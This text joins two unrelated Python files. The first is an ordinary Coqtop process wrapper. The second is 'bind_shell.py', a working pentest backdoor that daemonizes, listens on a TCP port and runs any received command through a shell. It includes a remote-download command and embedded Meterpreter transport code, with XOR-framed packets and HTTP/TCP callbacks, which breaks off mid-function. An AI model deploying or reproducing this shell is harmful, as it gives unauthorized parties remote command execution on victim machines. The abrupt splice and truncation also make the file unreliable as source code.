"""Initialize Coqtop state.
coqtop - The Coqtop process
states - A stack of previous state_ids (grows to the right)
state_id - The current state_id
root_state - The starting state_id
out_q - A thread-safe queue of data read from Coqtop
err_q - A thread-safe queue of error messages read from Coqtop
xml - The XML interface for the given version
"""
self.coqtop: Optional[CoqtopProcess] = None
self.xml: Optional[XMLInterfaceBase] = None
self.states: List[int] = []
self.state_id = -1
self.root_state = -1
self.out_q: BytesQueue = Queue()
self.err_q: BytesQueue = Queue()
self.stopping = False
# Debugging
self.log: Optional[IO[str]] = None
self.handler: logging.Handler = logging.NullHandler()
self.logger = logging.getLogger(str(id(self)))
self.logger.addHandler(self.handler)
self.logger.setLevel(logging.INFO)
# Coqtop Interface #
def start(
self,
coq_path: Optional[str],
coq_prog: Optional[str],
filename: str,
args: Iterable[str],
timeout: Optional[int] = None,
) -> Tuple[Union[VersionInfo, str], str]:
"""Launch the Coqtop process."""
assert self.coqtop is None
try:
self.logger.debug("start")
self.xml, latest = XMLInterface(coq_path, coq_prog)
launch = self.xml.launch(filename, args)
self.logger.debug(launch)
self.coqtop = subprocess.Popen( # pylint: disable=consider-using-with
launch,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
bufsize=0,
)
# Ensure that Coqtop spawned correctly
try:
self.coqtop.wait(timeout=0.1)
assert self.coqtop.stderr is not None
return self.coqtop.stderr.read().decode("utf8"), ""
except subprocess.TimeoutExpired:
pass
# Spawn threads to monitor Coqtop's stdout and stderr
for buf, stream in (
(self.out_q, self.coqtop.stdout),
(self.err_q, self.coqtop.stderr),
):
threading.Thread(
target=self.capture_out,
args=(buf, stream),
daemon=True,
).start()
threading.Thread(target=self.capture_dead, daemon=True).start()
# Initialize Coqtop
response, err = self.call(self.xml.init(), timeout=timeout)
if isinstance(response, Err):
return response.msg, err
self.root_state = response.val
self.state_id = response.val
return (
{
"version": self.xml.version,
"str_version": self.xml.str_version,
"latest": latest,
},
err,
)
except (OSError, FindCoqtopError) as e:
# Failed to launch or find Coqtop
self.coqtop = None
return str(e), ""
def stop(self) -> None:
"""End the Coqtop process."""
if self.coqtop is not None:
self.logger.debug("stop")
self.stopping = True
try:
# Try to terminate Coqtop cleanly
# TODO: use Quit call
self.coqtop.terminate()
self.coqtop.communicate()
except (OSError, ValueError, AttributeError):
try:
# Force Coqtop to stop
self.coqtop.kill()
except (OSError, AttributeError):
pass
self.coqtop = None
# Close debugging log
try:
self.handler.flush()
self.handler.close()
except ValueError:
pass
if self.log is not None and not self.log.closed:
self.log.close()
def advance(
self,
cmd: str,
encoding: str = "utf-8",
timeout: Optional[int] = None,
) -> Tuple[bool, str, Optional[Tuple[int, int]], str]:
"""Advance Coqtop by sending 'cmd'."""
assert self.xml is not None
self.logger.debug("advance: %s", cmd)
response, err1 = self.call(
self.xml.add(cmd, self.state_id, encoding=encoding),
timeout=timeout,
)
if isinstance(response, Err):
return False, response.msg, response.loc, err1
# In addition to sending 'cmd', also check status in order to force it
# to be evaluated
status, err2 = self.call(self.xml.status(encoding=encoding), timeout=timeout)
# Combine messages
msgs = "\n\n".join(
msg
for msg in (response.msg, response.val["res_msg"], status.msg)
if msg != ""
)
err = err1 + err2
if isinstance(status, Err):
# Reset state id to before the error
self.call(self.xml.edit_at(self.state_id, 1))
return False, msgs, status.loc, err
self.states.append(self.state_id)
self.state_id = response.val["state_id"]
return True, msgs, None, err
def rewind(self, steps: int = 1) -> Tuple[bool, str, Optional[int], str]:
"""Go back 'steps' states."""
assert self.xml is not None
self.logger.debug("rewind: %d", steps)
if steps > len(self.states):
self.state_id = self.root_state
self.states = []
steps = len(self.states)
else:
# In 8.4 query and option commands will be recorded with
# state_id = -1. Need to count them and reduce number of steps to
# rewind so Coqtop doesn't go too far back
fake_steps = sum(s == -1 for s in self.states[-steps:])
if self.states[-steps] != -1:
self.state_id = self.states[-steps]
else:
self.state_id = 0
self.states = self.states[:-steps]
steps -= fake_steps
response, err = self.call(self.xml.edit_at(self.state_id, steps))
return (
isinstance(response, Ok),
response.msg,
response.val if isinstance(response, Ok) else None,
err,
)
def query(
self,
cmd: str,
in_script: bool,
encoding: str = "utf-8",
timeout: Optional[int] = None,
) -> Tuple[bool, str, Optional[Tuple[int, int]], str]:
"""Query Coqtop with 'cmd'."""
assert self.xml is not None
self.logger.debug("query: %s", cmd)
response, err = self.call(
self.xml.query(cmd, self.state_id, encoding=encoding),
timeout=timeout,
)
if isinstance(response, Ok) and in_script:
# If the query was called from within the script we need to record
# the state id so rewinding will work properly. Since 8.4 uses
# number of steps rather than state ids, record '-1' to indicate
# that no rewind should actually be done
if self.xml.version >= (8, 5, 0):
self.states.append(self.state_id)
else:
self.states.append(-1)
return (
isinstance(response, Ok),
response.msg,
None if isinstance(response, Ok) else response.loc,
err,
)
def goals(
self,
timeout: Optional[int] = None,
) -> Tuple[bool, str, Optional[Goals], str]:
"""Get the current set of hypotheses and goals."""
assert self.xml is not None
self.logger.debug("goals")
response, err = self.call(self.xml.goal(), timeout=timeout)
return (
isinstance(response, Ok),
response.msg,
response.val if isinstance(response, Ok) else None,
err,
)
def do_option(
self,
cmd: str,
in_script: bool,
encoding: str = "utf-8",
timeout: Optional[int] = None,
) -> Tuple[bool, str, Optional[Tuple[int, int]], str]:
"""Set or get an option."""
assert self.xml is not None
self.logger.debug("do_option: %s", cmd)
vals, opt = self.xml.parse_option(cmd)
if vals is None:
response, err = self.call(
self.xml.get_options(encoding=encoding),
timeout=timeout,
)
if isinstance(response, Ok):
optval = [
(val, desc) for name, desc, val in response.val if name == opt
]
if optval != []:
ret = f"{optval[0][1]}: {optval[0][0]}"
else:
ret = "Invalid option name"
else:
errs = []
for val in vals:
response, err = self.call(
self.xml.set_options(opt, val, encoding=encoding),
timeout=timeout,
)
ret = response.msg
errs.append(err)
if isinstance(response, Ok):
break
err = "".join(errs)
if isinstance(response, Ok) and in_script:
# Hack to associate setting an option with a new state id by
# executing a noop so it works correctly with rewinding
if in_script:
success, _, _, _ = self.advance(self.xml.noop, encoding)
assert success
return (
isinstance(response, Ok),
ret if isinstance(response, Ok) else response.msg,
None if isinstance(response, Ok) else response.loc,
err,
)
def dispatch(
self,
cmd: str,
cmd_no_comment: Optional[str] = None,
in_script: bool = True,
encoding: str = "utf-8",
timeout: Optional[int] = None,
) -> Tuple[bool, str, Optional[Tuple[int, int]], str]:
"""Decide whether 'cmd' is setting/getting an option, a query, or a
regular command.
"""
# pylint: disable=no-else-return
assert self.xml is not None
if cmd_no_comment is None:
cmd_no_comment = cmd
if self.xml.is_option(cmd_no_comment):
return self.do_option(cmd_no_comment, in_script, encoding, timeout)
elif self.xml.is_query(cmd_no_comment):
return self.query(cmd, in_script, encoding, timeout)
elif in_script:
return self.advance(cmd, encoding, timeout)
else:
return True, "Command only allowed in script.", None, ""
# Interacting with Coqtop #
def call(
self,
cmdtype_msg: Tuple[str, Optional[bytes]],
timeout: Optional[int] = None,
) -> Tuple[Result, str]:
"""Send 'msg' to the Coqtop process and wait for the response."""
assert self.xml is not None
# Check if Coqtop has stopped
if not self.running():
raise CoqtopError("Coqtop is not running.")
# Throw away any unread messages
self.empty_out()
# 'msg' can be None if a command does not exist for a particular
# version and is being faked.
# NOTE: It is important that the '_standardize' function being called
# does not depend on the value it is passed since it is None
cmd, msg = cmdtype_msg
if msg is None:
return self.xml.standardize(cmd, Ok(None)), self.collect_err()
# Don't bother doing prettyxml if debugging isn't on
if self.logger.isEnabledFor(logging.DEBUG):
self.logger.debug(prettyxml(msg))
self.send_cmd(msg)
with futures.ThreadPoolExecutor(1) as pool:
try:
timeout = timeout if timeout != 0 else None
response, err = pool.submit(self.get_answer).result(timeout)
except futures.TimeoutError:
self.interrupt()
response, err = TIMEOUT_ERR, ""
return self.xml.standardize(cmd, response), err
def get_answer(self) -> Tuple[Result, str]:
"""Read from 'out_q' and wait until a full response is received."""
assert self.xml is not None
data = []
poll_sec = 1
while True:
# Abort if an error is printed to stderr, but ignore warnings.
# NOTE: If `warnings_wf` is False because this version of Coq does
# not follow the pattern expected by `partition_warnings` then
# pretend everything is a warning and hope for the best.
err = self.collect_err()
if self.xml.warnings_wf and partition_warnings(err)[1] != "":
return UNEXPECTED_ERR, err
try:
data.append(self.out_q.get(timeout=poll_sec))
except Empty:
continue
xml = b"".join(data)
if not self.xml.worth_parsing(xml):
continue
response = self.xml.raw_response(xml)
if response is None:
continue
# Don't bother doing prettyxml if debugging isn't on
if self.logger.isEnabledFor(logging.DEBUG):
self.logger.debug(prettyxml(b"<response>" + xml + b"</response>"))
return response, err
@staticmethod
def drain_queue(q: BytesQueue) -> Iterator[bytes]:
"""Yield data from 'q' until it is empty."""
while not q.empty():
try:
yield q.get_nowait()
except Empty:
return
def empty_out(self) -> None:
"""Pop data until 'out_q' is empty."""
for _ in Coqtop.drain_queue(self.out_q):
pass
def collect_err(self) -> str:
"""Pop and concatenate everything in 'err_q'."""
err = b"".join(Coqtop.drain_queue(self.err_q)).decode("utf-8")
if err != "":
self.logger.debug(err)
return err
def capture_out(self, buffer: BytesQueue, stream: IO[bytes]) -> None:
"""Continually read data from 'stream' into 'buffer'."""
while not self.stopping:
try:
buffer.put(stream.read(0x10000))
except (AttributeError, OSError, ValueError):
# Coqtop died
return
def capture_dead(self) -> None:
"""Continually check if Coqtop has died."""
while self.running():
time.sleep(1)
self.stop()
def send_cmd(self, cmd: bytes) -> None:
"""Write to Coqtop's stdin."""
if self.coqtop is None:
raise CoqtopError("coqtop must not be None in send_cmd()")
if self.coqtop.stdin is None:
raise CoqtopError("coqtop stdin must not be None in send_cmd()")
self.coqtop.stdin.write(cmd)
self.coqtop.stdin.flush()
def interrupt(self) -> None:
"""Send a SIGINT signal to Coqtop."""
if self.coqtop is None:
raise CoqtopError("Coqtop is not running.")
self.coqtop.send_signal(signal.SIGINT)
# Current State #
def running(self) -> bool:
"""Check if Coqtop has already been started."""
return self.coqtop is not None and self.coqtop.poll() is None
# Debugging #
def toggle_debug(self) -> Optional[str]:
"""Enable or disable logging of debug messages."""
self.logger.removeHandler(self.handler)
self.handler.flush()
self.handler.close()
if self.log is None:
# Create unique log file
fmt = logging.Formatter("%(asctime)s: %(message)s")
self.log = NamedTemporaryFile( # pylint: disable=consider-using-with
mode="w",
prefix=f"coqtop_{datetime.datetime.now().strftime('%y%m%d_%H%M%S')}_",
delete=False,
)
self.handler = logging.StreamHandler(self.log)
self.handler.setFormatter(fmt)
self.logger.addHandler(self.handler)
self.logger.setLevel(logging.DEBUG)
else:
# Clean up old logging
self.log.close()
# Set to null logging
self.log = None
self.handler = logging.NullHandler()
self.logger.addHandler(self.handler)
self.logger.setLevel(logging.CRITICAL)
return self.log.name if self.log is not None else None
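# A minimal usage sketch (an illustration of typical usage, not part of the original
# module; assumes a working Coq installation that XMLInterface can locate):
#
#   ct = Coqtop()
#   version_or_err, err = ct.start(None, None, "Example.v", [], timeout=5)
#   ok, msg, loc, err = ct.dispatch("Lemma triv : True.")
#   ok, msg, loc, err = ct.dispatch("Proof. exact I. Qed.")
#   ok, msg, goals, err = ct.goals()
#   ct.stop()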
|
bind_shell.py
|
#!/usr/bin/env python
#**************************************************************************#
# Filename: py_bind_shel.py (Created: 2016-08-14) #
# (Updated: 2016-10-02) #
# Info: #
# TBG Security Python BIND Shell for pentest #
# Author: #
# Ryan Hays #
#**************************************************************************#
import binascii
import code
import os
import platform
import random
import re
import select
import socket
import struct
import subprocess
import sys
import threading
import time
import traceback
import thread
import urllib2
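# NOTE: this script targets Python 2 only: it imports the Python 2 modules `thread`
# and `urllib2` and uses `except ..., e` / `raise ..., msg` syntax, so it must be run
# with a Python 2 interpreter.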
UMASK = 0
WORKDIR = "/"
MAXFD = 1024
try:
SHELLTYPE = sys.argv[1]
except IndexError:
SHELLTYPE = 'std'
try:
BINDPORT = int(sys.argv[2])
except IndexError:
BINDPORT = 8888
if hasattr(os, "devnull"):
REDIRECT_TO = os.devnull
else:
REDIRECT_TO = "/dev/null"
def createdaemon():
try:
pid = os.fork()
except OSError, e:
raise Exception, "%s [%d]" % (e.strerror, e.errno)
if pid == 0: # The first child.
os.setsid()
try:
pid = os.fork() # Fork a second child.
except OSError, e:
raise Exception, "%s [%d]" % (e.strerror, e.errno)
if pid == 0: # The second child.
os.chdir(WORKDIR)
os.umask(UMASK)
else:
os._exit(0) # Exit parent (the first child) of the second child.
else:
os._exit(0) # Exit parent of the first child.
import resource # Resource usage information.
maxfd = resource.getrlimit(resource.RLIMIT_NOFILE)[1]
if maxfd == resource.RLIM_INFINITY:
maxfd = MAXFD
for fd in range(0, maxfd):
try:
os.close(fd)
except OSError: # ERROR, fd wasn't open to begin with (ignored)
pass
os.open(REDIRECT_TO, os.O_RDWR) # standard input (0)
os.dup2(0, 1) # standard output (1)
os.dup2(0, 2) # standard error (2)
return (0)
def connection(conn):
conn.setblocking(1)
conn.send('Connection Established!')
while True:
conn.send('\n$')
data = conn.recv(1024)
if data.strip('\r\n') == 'quit' or data.strip('\r\n') == 'exit':
conn.close()
break
elif data.strip('\r\n').startswith('cd'):
try:
os.chdir(data.strip('\r\n')[3:])
except:
conn.send('The system path cannot be found!')
        elif data.strip('\r\n').startswith('wget'):
            try:
                url = data.strip('\r\n')[5:]
                f = open(os.path.basename(url), "wb")
                f.write(urllib2.urlopen(url).read())
                f.close()
                conn.send("Successfully downloaded %s" % os.path.basename(url))
            except:
                conn.send("Download failed!")
else:
proc = subprocess.Popen(data.strip('\r\n'), shell=True, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, stdin=subprocess.PIPE)
stdoutput = proc.stdout.read() + proc.stderr.read()
conn.send(stdoutput)
if __name__ == "__main__":
retCode = createdaemon()
procParams = """
return code = %s
process ID = %s
parent process ID = %s
process group ID = %s
session ID = %s
user ID = %s
effective user ID = %s
real group ID = %s
effective group ID = %s
""" % (retCode, os.getpid(), os.getppid(), os.getpgrp(), os.getsid(0),
os.getuid(), os.geteuid(), os.getgid(), os.getegid())
if SHELLTYPE.lower() == 'std':
while True:
try:
s = socket.socket()
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind(('', BINDPORT))
s.listen(5)
while True:
s.settimeout(2)
try:
conn, addr = s.accept()
except socket.timeout:
continue
if conn:
s.settimeout(None)
thread.start_new_thread(connection, (conn,))
except:
pass
elif SHELLTYPE.lower() == 'msf':
try:
import ctypes
except ImportError:
has_windll = False
else:
has_windll = hasattr(ctypes, 'windll')
try:
urllib_imports = ['ProxyHandler', 'Request', 'build_opener', 'install_opener', 'urlopen']
if sys.version_info[0] < 3:
urllib = __import__('urllib2', fromlist=urllib_imports)
else:
urllib = __import__('urllib.request', fromlist=urllib_imports)
except ImportError:
has_urllib = False
else:
has_urllib = True
if sys.version_info[0] < 3:
is_str = lambda obj: issubclass(obj.__class__, str)
is_bytes = lambda obj: issubclass(obj.__class__, str)
bytes = lambda *args: str(*args[:1])
NULL_BYTE = '\x00'
unicode = lambda x: (x.decode('UTF-8') if isinstance(x, str) else x)
else:
if isinstance(__builtins__, dict):
is_str = lambda obj: issubclass(obj.__class__, __builtins__['str'])
str = lambda x: __builtins__['str'](x, *(() if isinstance(x, (float, int)) else ('UTF-8',)))
else:
is_str = lambda obj: issubclass(obj.__class__, __builtins__.str)
str = lambda x: __builtins__.str(x, *(() if isinstance(x, (float, int)) else ('UTF-8',)))
is_bytes = lambda obj: issubclass(obj.__class__, bytes)
NULL_BYTE = bytes('\x00', 'UTF-8')
long = int
unicode = lambda x: (x.decode('UTF-8') if isinstance(x, bytes) else x)
# reseed the random generator.
random.seed()
#
# Constants
#
# these values will be patched, DO NOT CHANGE THEM
DEBUGGING = False
HTTP_CONNECTION_URL = None
HTTP_PROXY = None
HTTP_USER_AGENT = None
PAYLOAD_UUID = '4ac742fe5c99f0c1a1e4b4f0f6152f24'
SESSION_COMMUNICATION_TIMEOUT = 300
SESSION_EXPIRATION_TIMEOUT = 604800
SESSION_RETRY_TOTAL = 3600
SESSION_RETRY_WAIT = 10
PACKET_TYPE_REQUEST = 0
PACKET_TYPE_RESPONSE = 1
PACKET_TYPE_PLAIN_REQUEST = 10
PACKET_TYPE_PLAIN_RESPONSE = 11
ERROR_SUCCESS = 0
# not defined in original C implementation
ERROR_FAILURE = 1
ERROR_FAILURE_PYTHON = 2
ERROR_FAILURE_WINDOWS = 3
CHANNEL_CLASS_BUFFERED = 0
CHANNEL_CLASS_STREAM = 1
CHANNEL_CLASS_DATAGRAM = 2
CHANNEL_CLASS_POOL = 3
#
# TLV Meta Types
#
TLV_META_TYPE_NONE = (0)
TLV_META_TYPE_STRING = (1 << 16)
TLV_META_TYPE_UINT = (1 << 17)
TLV_META_TYPE_RAW = (1 << 18)
TLV_META_TYPE_BOOL = (1 << 19)
TLV_META_TYPE_QWORD = (1 << 20)
TLV_META_TYPE_COMPRESSED = (1 << 29)
TLV_META_TYPE_GROUP = (1 << 30)
TLV_META_TYPE_COMPLEX = (1 << 31)
# not defined in original
TLV_META_TYPE_MASK = (1 << 31) + (1 << 30) + (1 << 29) + (1 << 19) + (1 << 18) + (1 << 17) + (1 << 16)
#
# TLV base starting points
#
TLV_RESERVED = 0
TLV_EXTENSIONS = 20000
TLV_USER = 40000
TLV_TEMP = 60000
#
# TLV Specific Types
#
TLV_TYPE_ANY = TLV_META_TYPE_NONE | 0
TLV_TYPE_METHOD = TLV_META_TYPE_STRING | 1
TLV_TYPE_REQUEST_ID = TLV_META_TYPE_STRING | 2
TLV_TYPE_EXCEPTION = TLV_META_TYPE_GROUP | 3
TLV_TYPE_RESULT = TLV_META_TYPE_UINT | 4
TLV_TYPE_STRING = TLV_META_TYPE_STRING | 10
TLV_TYPE_UINT = TLV_META_TYPE_UINT | 11
TLV_TYPE_BOOL = TLV_META_TYPE_BOOL | 12
TLV_TYPE_LENGTH = TLV_META_TYPE_UINT | 25
TLV_TYPE_DATA = TLV_META_TYPE_RAW | 26
TLV_TYPE_FLAGS = TLV_META_TYPE_UINT | 27
TLV_TYPE_CHANNEL_ID = TLV_META_TYPE_UINT | 50
TLV_TYPE_CHANNEL_TYPE = TLV_META_TYPE_STRING | 51
TLV_TYPE_CHANNEL_DATA = TLV_META_TYPE_RAW | 52
TLV_TYPE_CHANNEL_DATA_GROUP = TLV_META_TYPE_GROUP | 53
TLV_TYPE_CHANNEL_CLASS = TLV_META_TYPE_UINT | 54
TLV_TYPE_CHANNEL_PARENTID = TLV_META_TYPE_UINT | 55
TLV_TYPE_SEEK_WHENCE = TLV_META_TYPE_UINT | 70
TLV_TYPE_SEEK_OFFSET = TLV_META_TYPE_UINT | 71
TLV_TYPE_SEEK_POS = TLV_META_TYPE_UINT | 72
TLV_TYPE_EXCEPTION_CODE = TLV_META_TYPE_UINT | 300
TLV_TYPE_EXCEPTION_STRING = TLV_META_TYPE_STRING | 301
TLV_TYPE_LIBRARY_PATH = TLV_META_TYPE_STRING | 400
TLV_TYPE_TARGET_PATH = TLV_META_TYPE_STRING | 401
TLV_TYPE_MIGRATE_PID = TLV_META_TYPE_UINT | 402
TLV_TYPE_MIGRATE_LEN = TLV_META_TYPE_UINT | 403
TLV_TYPE_TRANS_TYPE = TLV_META_TYPE_UINT | 430
TLV_TYPE_TRANS_URL = TLV_META_TYPE_STRING | 431
TLV_TYPE_TRANS_UA = TLV_META_TYPE_STRING | 432
TLV_TYPE_TRANS_COMM_TIMEOUT = TLV_META_TYPE_UINT | 433
TLV_TYPE_TRANS_SESSION_EXP = TLV_META_TYPE_UINT | 434
TLV_TYPE_TRANS_CERT_HASH = TLV_META_TYPE_RAW | 435
TLV_TYPE_TRANS_PROXY_HOST = TLV_META_TYPE_STRING | 436
TLV_TYPE_TRANS_PROXY_USER = TLV_META_TYPE_STRING | 437
TLV_TYPE_TRANS_PROXY_PASS = TLV_META_TYPE_STRING | 438
TLV_TYPE_TRANS_RETRY_TOTAL = TLV_META_TYPE_UINT | 439
TLV_TYPE_TRANS_RETRY_WAIT = TLV_META_TYPE_UINT | 440
TLV_TYPE_TRANS_GROUP = TLV_META_TYPE_GROUP | 441
TLV_TYPE_MACHINE_ID = TLV_META_TYPE_STRING | 460
TLV_TYPE_UUID = TLV_META_TYPE_RAW | 461
TLV_TYPE_CIPHER_NAME = TLV_META_TYPE_STRING | 500
TLV_TYPE_CIPHER_PARAMETERS = TLV_META_TYPE_GROUP | 501
TLV_TYPE_PEER_HOST = TLV_META_TYPE_STRING | 1500
TLV_TYPE_PEER_PORT = TLV_META_TYPE_UINT | 1501
TLV_TYPE_LOCAL_HOST = TLV_META_TYPE_STRING | 1502
TLV_TYPE_LOCAL_PORT = TLV_META_TYPE_UINT | 1503
EXPORTED_SYMBOLS = {}
EXPORTED_SYMBOLS['DEBUGGING'] = DEBUGGING
def rand_byte():
return chr(random.randint(1, 255))
def rand_xor_key():
return ''.join(rand_byte() for _ in range(4))
def xor_bytes(key, data):
return ''.join(chr(ord(data[i]) ^ ord(key[i % len(key)])) for i in range(len(data)))
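# Worked example of the XOR framing used by the transports below (illustration only):
# send_packet() transmits key[::-1] + xor_bytes(key, pkt) with a fresh 4-byte key, so
# a receiver reverses the first 4 bytes to recover the key and XORs the rest with it
# to get the original packet back (XOR with the same key is its own inverse).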
def export(symbol):
EXPORTED_SYMBOLS[symbol.__name__] = symbol
return symbol
def generate_request_id():
chars = 'abcdefghijklmnopqrstuvwxyz'
return ''.join(random.choice(chars) for x in range(32))
@export
def crc16(data):
poly = 0x1021
reg = 0x0000
if is_str(data):
data = list(map(ord, data))
elif is_bytes(data):
data = list(data)
data.append(0)
data.append(0)
for byte in data:
mask = 0x80
while mask > 0:
reg <<= 1
if byte & mask:
reg += 1
mask >>= 1
if reg > 0xffff:
reg &= 0xffff
reg ^= poly
return reg
@export
def error_result(exception=None):
if not exception:
_, exception, _ = sys.exc_info()
exception_crc = crc16(exception.__class__.__name__)
if exception_crc == 0x4cb2: # WindowsError
return error_result_windows(exception.errno)
else:
result = ((exception_crc << 16) | ERROR_FAILURE_PYTHON)
return result
@export
def error_result_windows(error_number=None):
if not has_windll:
return ERROR_FAILURE
if error_number == None:
error_number = ctypes.windll.kernel32.GetLastError()
if error_number > 0xffff:
return ERROR_FAILURE
result = ((error_number << 16) | ERROR_FAILURE_WINDOWS)
return result
@export
def get_hdd_label():
for _, _, files in os.walk('/dev/disk/by-id/'):
for f in files:
for p in ['ata-', 'mb-']:
if f[:len(p)] == p:
return f[len(p):]
return ''
@export
def inet_pton(family, address):
if hasattr(socket, 'inet_pton'):
return socket.inet_pton(family, address)
elif has_windll:
WSAStringToAddress = ctypes.windll.ws2_32.WSAStringToAddressA
lpAddress = (ctypes.c_ubyte * 28)()
lpAddressLength = ctypes.c_int(ctypes.sizeof(lpAddress))
if WSAStringToAddress(address, family, None, ctypes.byref(lpAddress),
ctypes.byref(lpAddressLength)) != 0:
raise Exception('WSAStringToAddress failed')
if family == socket.AF_INET:
return ''.join(map(chr, lpAddress[4:8]))
elif family == socket.AF_INET6:
return ''.join(map(chr, lpAddress[8:24]))
raise Exception('no suitable inet_pton functionality is available')
@export
def packet_enum_tlvs(pkt, tlv_type=None):
offset = 0
while (offset < len(pkt)):
tlv = struct.unpack('>II', pkt[offset:offset + 8])
if (tlv_type == None) or ((tlv[1] & ~TLV_META_TYPE_COMPRESSED) == tlv_type):
val = pkt[offset + 8:(offset + 8 + (tlv[0] - 8))]
if (tlv[1] & TLV_META_TYPE_STRING) == TLV_META_TYPE_STRING:
val = str(val.split(NULL_BYTE, 1)[0])
elif (tlv[1] & TLV_META_TYPE_UINT) == TLV_META_TYPE_UINT:
val = struct.unpack('>I', val)[0]
elif (tlv[1] & TLV_META_TYPE_QWORD) == TLV_META_TYPE_QWORD:
val = struct.unpack('>Q', val)[0]
elif (tlv[1] & TLV_META_TYPE_BOOL) == TLV_META_TYPE_BOOL:
val = bool(struct.unpack('b', val)[0])
elif (tlv[1] & TLV_META_TYPE_RAW) == TLV_META_TYPE_RAW:
pass
yield {'type': tlv[1], 'length': tlv[0], 'value': val}
offset += tlv[0]
    # the generator simply ends once offset reaches len(pkt)
@export
def packet_get_tlv(pkt, tlv_type):
try:
tlv = list(packet_enum_tlvs(pkt, tlv_type))[0]
except IndexError:
return {}
return tlv
@export
def tlv_pack(*args):
if len(args) == 2:
tlv = {'type': args[0], 'value': args[1]}
else:
tlv = args[0]
data = ''
value = tlv['value']
if (tlv['type'] & TLV_META_TYPE_UINT) == TLV_META_TYPE_UINT:
if isinstance(value, float):
value = int(round(value))
data = struct.pack('>III', 12, tlv['type'], value)
elif (tlv['type'] & TLV_META_TYPE_QWORD) == TLV_META_TYPE_QWORD:
data = struct.pack('>IIQ', 16, tlv['type'], value)
elif (tlv['type'] & TLV_META_TYPE_BOOL) == TLV_META_TYPE_BOOL:
data = struct.pack('>II', 9, tlv['type']) + bytes(chr(int(bool(value))), 'UTF-8')
else:
if sys.version_info[0] < 3 and value.__class__.__name__ == 'unicode':
value = value.encode('UTF-8')
elif not is_bytes(value):
value = bytes(value, 'UTF-8')
if (tlv['type'] & TLV_META_TYPE_STRING) == TLV_META_TYPE_STRING:
data = struct.pack('>II', 8 + len(value) + 1, tlv['type']) + value + NULL_BYTE
elif (tlv['type'] & TLV_META_TYPE_RAW) == TLV_META_TYPE_RAW:
data = struct.pack('>II', 8 + len(value), tlv['type']) + value
elif (tlv['type'] & TLV_META_TYPE_GROUP) == TLV_META_TYPE_GROUP:
data = struct.pack('>II', 8 + len(value), tlv['type']) + value
elif (tlv['type'] & TLV_META_TYPE_COMPLEX) == TLV_META_TYPE_COMPLEX:
data = struct.pack('>II', 8 + len(value), tlv['type']) + value
return data
@export
def tlv_pack_response(result, response):
response += tlv_pack(TLV_TYPE_RESULT, result)
response = struct.pack('>I', len(response) + 4) + response
return response
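# Worked example (illustration only): tlv_pack(TLV_TYPE_UINT, 5) yields the 12-byte
# record struct.pack('>III', 12, TLV_TYPE_UINT, 5): a big-endian total length (the
# 8-byte header included), the type, then the value. tlv_pack_response() appends a
# TLV_TYPE_RESULT record to the body and prepends the 4-byte overall packet length.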
# @export
class MeterpreterFile(object):
def __init__(self, file_obj):
self.file_obj = file_obj
def __getattr__(self, name):
return getattr(self.file_obj, name)
export(MeterpreterFile)
# @export
class MeterpreterSocket(object):
def __init__(self, sock):
self.sock = sock
def __getattr__(self, name):
return getattr(self.sock, name)
export(MeterpreterSocket)
# @export
class MeterpreterSocketClient(MeterpreterSocket):
pass
export(MeterpreterSocketClient)
# @export
class MeterpreterSocketServer(MeterpreterSocket):
pass
export(MeterpreterSocketServer)
class STDProcessBuffer(threading.Thread):
def __init__(self, std, is_alive):
threading.Thread.__init__(self)
self.std = std
self.is_alive = is_alive
self.data = bytes()
self.data_lock = threading.RLock()
def run(self):
for byte in iter(lambda: self.std.read(1), bytes()):
self.data_lock.acquire()
self.data += byte
self.data_lock.release()
def is_read_ready(self):
return len(self.data) != 0
def peek(self, l=None):
data = bytes()
self.data_lock.acquire()
if l == None:
data = self.data
else:
data = self.data[0:l]
self.data_lock.release()
return data
def read(self, l=None):
self.data_lock.acquire()
data = self.peek(l)
self.data = self.data[len(data):]
self.data_lock.release()
return data
# @export
class STDProcess(subprocess.Popen):
def __init__(self, *args, **kwargs):
subprocess.Popen.__init__(self, *args, **kwargs)
self.echo_protection = False
def start(self):
self.stdout_reader = STDProcessBuffer(self.stdout, lambda: self.poll() == None)
self.stdout_reader.start()
self.stderr_reader = STDProcessBuffer(self.stderr, lambda: self.poll() == None)
self.stderr_reader.start()
def write(self, channel_data):
self.stdin.write(channel_data)
self.stdin.flush()
if self.echo_protection:
end_time = time.time() + 0.5
out_data = bytes()
while (time.time() < end_time) and (out_data != channel_data):
if self.stdout_reader.is_read_ready():
out_data = self.stdout_reader.peek(len(channel_data))
if out_data == channel_data:
self.stdout_reader.read(len(channel_data))
export(STDProcess)
class Transport(object):
def __init__(self):
self.communication_timeout = SESSION_COMMUNICATION_TIMEOUT
self.communication_last = 0
self.retry_total = SESSION_RETRY_TOTAL
self.retry_wait = SESSION_RETRY_WAIT
self.request_retire = False
def __repr__(self):
return "<{0} url='{1}' >".format(self.__class__.__name__, self.url)
@property
def communication_has_expired(self):
return self.communication_last + self.communication_timeout < time.time()
@property
def should_retire(self):
return self.communication_has_expired or self.request_retire
@staticmethod
def from_request(request):
url = packet_get_tlv(request, TLV_TYPE_TRANS_URL)['value']
if url.startswith('tcp'):
transport = TcpTransport(url)
elif url.startswith('http'):
proxy = packet_get_tlv(request, TLV_TYPE_TRANS_PROXY_HOST).get('value')
user_agent = packet_get_tlv(request, TLV_TYPE_TRANS_UA).get('value', HTTP_USER_AGENT)
transport = HttpTransport(url, proxy=proxy, user_agent=user_agent)
transport.communication_timeout = packet_get_tlv(request, TLV_TYPE_TRANS_COMM_TIMEOUT).get('value',
SESSION_COMMUNICATION_TIMEOUT)
transport.retry_total = packet_get_tlv(request, TLV_TYPE_TRANS_RETRY_TOTAL).get('value',
SESSION_RETRY_TOTAL)
transport.retry_wait = packet_get_tlv(request, TLV_TYPE_TRANS_RETRY_WAIT).get('value',
SESSION_RETRY_WAIT)
return transport
def _activate(self):
return True
def activate(self):
end_time = time.time() + self.retry_total
while time.time() < end_time:
try:
activate_succeeded = self._activate()
except:
activate_succeeded = False
if activate_succeeded:
self.communication_last = time.time()
return True
time.sleep(self.retry_wait)
return False
def _deactivate(self):
return
def deactivate(self):
try:
self._deactivate()
except:
pass
self.communication_last = 0
return True
def get_packet(self):
self.request_retire = False
try:
pkt = self._get_packet()
except:
return None
if pkt is None:
return None
self.communication_last = time.time()
return pkt
def send_packet(self, pkt):
self.request_retire = False
try:
xor_key = rand_xor_key()
